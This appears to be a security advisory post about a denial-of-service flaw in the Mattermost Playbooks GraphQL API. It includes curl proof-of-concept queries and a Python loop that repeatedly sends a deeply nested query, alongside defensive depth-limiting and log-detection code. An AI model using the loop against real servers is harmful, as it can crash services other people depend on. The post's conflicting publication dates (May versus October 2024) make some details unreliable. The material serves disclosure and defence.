CVE-2024-47401 - Amplified GraphQL Response in Mattermost Playbooks Can Crash Your Server
On May 8, 2024, a new vulnerability—CVE-2024-47401—was published, affecting several versions of Mattermost, the popular open-source collaboration and messaging platform. This vulnerability can let anyone trigger a colossal response from the GraphQL API via the Playbooks feature, overloading system resources and potentially crashing the entire application.
This post explains the vulnerability in simple language, presents code snippets and a proof-of-concept exploit, and cites original references. If your organization uses Mattermost, especially Playbooks, this is a critical issue to understand.
What is Mattermost Playbooks?
Mattermost Playbooks is a workflow automation tool that allows teams to automate processes, manage incidents, and share repeatable checklists—all deeply integrated within Mattermost channels. Playbooks are heavily used in incident response, release cycles, and compliance reporting.
Vulnerability Details
Normally, applications hide detailed error messages from users to avoid leaking sensitive data and to prevent attackers from using them in denial-of-service (DoS) attacks. But in vulnerable versions of Mattermost, the Playbooks plugin's GraphQL endpoint fails to block overly detailed error messages. An attacker can craft a request that triggers a massive, verbose error response. When repeated, this behavior eats up server memory and can cause the application (or the underlying system) to crash.
Why is This Vulnerable?
The vulnerability exists because the Playbooks GraphQL API does not restrain its error output after evaluating a user's malformed or abusive request: instead of a short, generic error, it returns the whole error stack or builds massively nested error responses.
Malformed GraphQL query → recursive error reporting → huge response payload.
If this is repeated, the server spends its time building these massive error reports, quickly exhausting memory or CPU and eventually crashing.
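The deep nesting the post describes is exactly what a pre-execution depth limit is meant to stop. The Python below is an added example, not Mattermost or Playbooks code, and it does not describe how the 9.5.10 fix works; it assumes a server-side hook that can inspect the raw query string before execution, with `MAX_DEPTH = 4` as a constructed policy value. The scanner ignores braces inside string literals and `#` comments so a crafted query cannot hide its nesting from the count, and the rejection message is deliberately generic, the opposite of the verbose error behaviour the post describes.

```python
"""Reject GraphQL documents whose selection nesting exceeds a limit.

Added example, not Mattermost or Playbooks code. Assumes the server can run
a check on the raw query string before executing it; MAX_DEPTH is a
constructed policy value for illustration.
"""

MAX_DEPTH = 4  # constructed policy value, tune per deployment


def selection_depth(query: str) -> int:
    """Return the deepest selection-set nesting in a GraphQL document.

    Braces inside ordinary strings ("..."), block strings (three double
    quotes) and '#' comments are skipped so they cannot skew the count.
    """
    depth = 0
    deepest = 0
    i = 0
    n = len(query)
    while i < n:
        ch = query[i]
        if ch == "#":                        # comment runs to end of line
            while i < n and query[i] != "\n":
                i += 1
        elif query.startswith('"""', i):     # block string literal
            end = query.find('"""', i + 3)
            i = n if end == -1 else end + 3
            continue
        elif ch == '"':                      # ordinary string, honour escapes
            i += 1
            while i < n and query[i] != '"':
                i += 2 if query[i] == "\\" else 1
        elif ch == "{":
            depth += 1
            deepest = max(deepest, depth)
        elif ch == "}":
            depth = max(depth - 1, 0)
        i += 1
    return deepest


def check_query(query: str, max_depth: int = MAX_DEPTH) -> tuple[bool, str]:
    """Return (allowed, reason) for a query under the depth policy."""
    d = selection_depth(query)
    if d > max_depth:
        # Generic message: never echo the schema or the offending query back.
        return False, f"query rejected: nesting depth {d} exceeds limit {max_depth}"
    return True, f"query accepted: depth {d}"


if __name__ == "__main__":
    for q in (
        "{ playbooks { nodes { name } } }",
        "{ __schema { types { fields { name type { fields { name } } } } } }",
    ):
        print(check_query(q))
```

Both queries shown later in the post (depth 5 and depth 8) are rejected by this policy, while an ordinary three-level Playbooks listing passes.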
Sample Malicious GraphQL Query
Below is a simple cURL command that exploits this issue by intentionally nesting a Playbooks query. We’re requesting deeply nested resources, tripping the error handler into producing an enormous response:
```shell
curl -X POST https://your.mattermost.server/plugins/playbooks/api/v1/graphql \
  -H "Content-Type: application/json" \
  -d '{ "query": "query { playbooks { nodes { name description steps { name description actions { name } } } } }" }'
```
For extra impact, attackers can deliberately send queries that do not match the schema, or that nest requests very deeply, forcing infinite or recursive error descriptions:
```shell
curl -X POST https://your.mattermost.server/plugins/playbooks/api/v1/graphql \
  -H "Content-Type: application/json" \
  -d '{ "query": "{ __schema { types { fields { name type { fields { name type { fields { name } } } } } } } }" }'
```
The above query asks GraphQL for a deeply-nested schema report—more than the server can handle gracefully. The error generated will include mountains of type and field descriptions.
- These responses balloon in size—dozens of megabytes per request.
- If repeated, the server's memory and/or CPU are consumed, leading to a denial of service or total crash.
Here’s a Python snippet that loops the attack:
```python
import requests

url = 'https://your.mattermost.server/plugins/playbooks/api/v1/graphql'
payload = {
    "query": "{ __schema { types { fields { name type { fields { name type { fields { name } } } } } } } }"
}
headers = {'Content-Type': 'application/json'}

# Send the malicious query in a loop and report how large each response is
for i in range(100):
    resp = requests.post(url, json=payload, headers=headers)
    print(f"[{i}] Response length: {len(resp.text)}")
```
Mitigation & Patching
Upgrade immediately to Mattermost 9.5.10.
You can find upgrade guidance here:
- Mattermost Changelog
- Mattermost Security Updates
- Disable the Playbooks plugin if it is not critical.
- Use a WAF (Web Application Firewall) to filter POST requests to /plugins/playbooks/api/v1/graphql.
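Until the upgrade lands, the repeated oversized replies the post describes are visible in the reverse proxy's access log long before memory runs out. The script below is an added example, not Mattermost code; it assumes an nginx or Apache combined-format log in front of Mattermost, and the sample log lines, the 5 MiB size threshold, the 60-second window and the burst count of 3 are all constructed values. It groups oversized POST responses to the Playbooks GraphQL path by client and raises one alert per client whose densest window crosses the burst threshold.

```python
"""Flag clients receiving bursts of oversized Playbooks GraphQL responses.

Added example, not Mattermost code. Assumes a combined-format access log from
the reverse proxy in front of Mattermost; all thresholds and log lines below
are constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

GRAPHQL_PATH = "/plugins/playbooks/api/v1/graphql"
OVERSIZED_BYTES = 5 * 1024 * 1024   # constructed threshold: 5 MiB per response
BURST_COUNT = 3                      # constructed: oversized replies per window
WINDOW = timedelta(seconds=60)       # constructed: sliding window length

# Combined log format: client, timestamp, request line, status, body bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Constructed sample: 10.0.0.5 hammers the GraphQL endpoint and gets ~30 MiB
# back each time; the other lines are normal traffic, an unrelated large
# download, and a line that does not parse at all.
SAMPLE_LOG = [
    '10.0.0.9 - - [29/Oct/2024:10:15:00 +0000] "POST /plugins/playbooks/api/v1/graphql HTTP/1.1" 200 2048',
    '10.0.0.5 - - [29/Oct/2024:10:15:01 +0000] "POST /plugins/playbooks/api/v1/graphql HTTP/1.1" 200 31457280',
    '10.0.0.5 - - [29/Oct/2024:10:15:03 +0000] "POST /plugins/playbooks/api/v1/graphql HTTP/1.1" 200 31457280',
    '10.0.0.7 - - [29/Oct/2024:10:15:04 +0000] "GET /static/bundle.js HTTP/1.1" 200 52428800',
    '10.0.0.5 - - [29/Oct/2024:10:15:06 +0000] "POST /plugins/playbooks/api/v1/graphql HTTP/1.1" 200 31457280',
    '10.0.0.5 - - [29/Oct/2024:10:15:09 +0000] "POST /plugins/playbooks/api/v1/graphql HTTP/1.1" 200 31457280',
    'garbage line that does not parse',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
        "bytes": 0 if m["bytes"] == "-" else int(m["bytes"]),
    }


def find_amplification_bursts(lines, window=WINDOW, burst=BURST_COUNT,
                              min_bytes=OVERSIZED_BYTES):
    """Return one alert per client that received `burst` or more oversized
    GraphQL responses inside any span of length `window`."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != GRAPHQL_PATH:
            continue
        if rec["bytes"] >= min_bytes:
            per_ip[rec["ip"]].append(rec)

    alerts = []
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        best = (0, 0, 0)   # (count, start index, end index) of the densest window
        start = 0
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            if end - start + 1 > best[0]:
                best = (end - start + 1, start, end)
        count, s, e = best
        if count >= burst:
            hits = recs[s:e + 1]
            alerts.append({
                "ip": ip,
                "count": count,
                "bytes": sum(r["bytes"] for r in hits),
                "first": hits[0]["ts"].isoformat(),
                "last": hits[-1]["ts"].isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for a in find_amplification_bursts(SAMPLE_LOG):
        print(f"{a['ip']}: {a['count']} oversized GraphQL responses "
              f"({a['bytes'] / 2**20:.0f} MiB) between {a['first']} and {a['last']}")
```

Feeding the real log through `find_amplification_bursts` (for example from a cron job or a SIEM scheduled search) gives a per-client list that can drive a temporary block at the WAF or proxy; keying on response size rather than request count is what separates this abuse from a busy but legitimate Playbooks user.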
References
- Official CVE Record: CVE-2024-47401
- Mattermost Security Portal
- Playbooks Feature Documentation
Conclusion
CVE-2024-47401 is a serious vulnerability that could let an attacker crash your Mattermost server using nothing more than some clever (or malicious) GraphQL queries. By failing to properly sanitize error output, the Playbooks plugin lets attackers “amplify” server responses beyond safe limits.
The solution is simple—patch your Mattermost server! If you run Playbooks and can't upgrade immediately, consider disabling the plugin or blocking GraphQL access until you're protected.
*Stay safe, and keep your collaboration tools patched!*
Timeline
Published on: 10/29/2024 09:15:07 UTC
Last modified on: 10/29/2024 14:34:04 UTC